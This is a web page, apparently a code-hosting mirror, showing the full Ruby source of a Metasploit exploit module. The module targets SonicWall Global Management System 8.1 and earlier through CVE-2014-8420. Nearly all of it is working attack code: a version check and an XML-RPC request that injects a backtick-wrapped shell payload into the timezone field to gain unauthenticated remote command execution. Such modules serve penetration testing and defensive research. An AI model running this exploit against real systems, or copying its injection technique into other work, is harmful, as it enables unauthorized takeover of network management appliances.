Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb
23873 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7


8
  Rank = ExcellentRanking

9


10
  include Msf::Exploit::Remote::HttpClient

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => "SonicWall Global Management System XMLRPC set_time_zone Unauth RCE",

17
        'Description' => %q{

18
          This module exploits a vulnerability in SonicWall Global

19
          Management System Virtual Appliance versions 8.1 (Build 8110.1197)

20
          and below. This virtual appliance can be downloaded from

21
          http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a

22
          holistic way to manage your entire network security environment.'

23


24
          These vulnerable versions (8.1 Build 8110.1197 and below) do not

25
          prevent unauthenticated, external entities from making XML-RPC

26
          requests to port 21009 of the virtual app. After the XML-RPC call

27
          is made, a shell script is called like so:

28
          'timeSetup.sh --tz="`command injection here`"' --usentp="blah"'.

29
        },

30
        'License' => MSF_LICENSE,

31
        'Author' => [

32
          'Michael Flanders', # MSF Module

33
          'kernelsmith' # Advisor

34
        ],

35
        'References' => [

36
          ['CVE', '2014-8420'],

37
          ['URL', 'https://www.digitaldefense.com/digital-defense/vrt-discoveries/'],

38
          ['URL', 'https://slides.com/kernelsmith/bsidesaustin2018/#/']

39
        ],

40
        'Platform' => [ 'unix' ],

41
        'Arch' => ARCH_CMD,

42
        'Targets' => [

43
          [ 'SonicWall Global Management System Virtual Appliance', {} ],

44
        ],

45
        'Payload' => {

46
          # Can't use ampersand, Java's XML-RPC parser will complain and return an error

47
          'BadChars' => "\x26",

48
          'Compat' => {

49
            'PayloadType' => 'cmd',

50
            'RequiredCmd' => 'generic bash telnet'

51
          }

52
        },

53
        'DisclosureDate' => '2016-07-22',

54
        'DefaultTarget' => 0,

55
        'Notes' => {

56
          'Reliability' => UNKNOWN_RELIABILITY,

57
          'Stability' => UNKNOWN_STABILITY,

58
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

59
        }

60
      )

61
    )

62


63
    register_options(

64
      [

65
        OptString.new('WEB_SERVER_PORT', [

66
          false, 'Port of web console login page.

67
                                             Defaults to 80/443 depending on SSL.'

68
        ])

69
      ]

70
    )

71
  end

72


73
  def check

74
    if datastore['WEB_SERVER_PORT']

75
      port_number = datastore['WEB_SERVER_PORT']

76
    else

77
      port_number = datastore['SSL'] ? '443' : '80'

78
    end

79


80
    handler = datastore['SSL'] ? 'https' : 'http'

81


82
    res = request_url("#{handler}://#{rhost}:#{port_number}")

83


84
    unless res

85
      vprint_error 'Connection failed'

86
      return CheckCode::Unknown

87
    end

88


89
    unless res.code == 200 && res.body =~ /<TITLE>.+v(\d\.\d)/

90
      return CheckCode::Safe

91
    end

92


93
    version = Rex::Version.new $1.to_s

94


95
    unless version <= Rex::Version.new('8.1')

96
      return CheckCode::Safe

97
    end

98


99
    CheckCode::Appears

100
  end

101


102
  def exploit

103
    unless check == CheckCode::Appears

104
      fail_with Failure::NotVulnerable, "The target is not vulnerable."

105
    end

106


107
    print_status "The target appears to be vulnerable, continuing exploit..."

108
    send_xml

109
  end

110


111
  def send_xml

112
    xml_body = <<~HERESTRING

113
      <?xml version="1.0" encoding="UTF-8"?>

114
      <methodCall>

115
        <methodName>set_time_config</methodName>

116
        <params>

117
          <param>

118
            <value>

119
              <struct>

120
                <member>

121
                  <name>timezone</name>

122
                  <value>

123
                    <string>"`#{payload.encoded}`"</string>

124
                  </value>

125
                </member>

126
              </struct>

127
            </value>

128
          </param>

129
        </params>

130
      </methodCall>

131
    HERESTRING

132


133
    res = send_request_raw({

134
      'method' => 'POST',

135
      'uri' => '/',

136
      'data' => xml_body,

137
      'ctype' => 'text/xml; charset=UTF-8'

138
    })

139


140
    unless res && res.body.include?("success")

141
      print_error("Error sending XML to #{rhost}:#{rport}")

142
    end

143
  end

144


145
end

146


147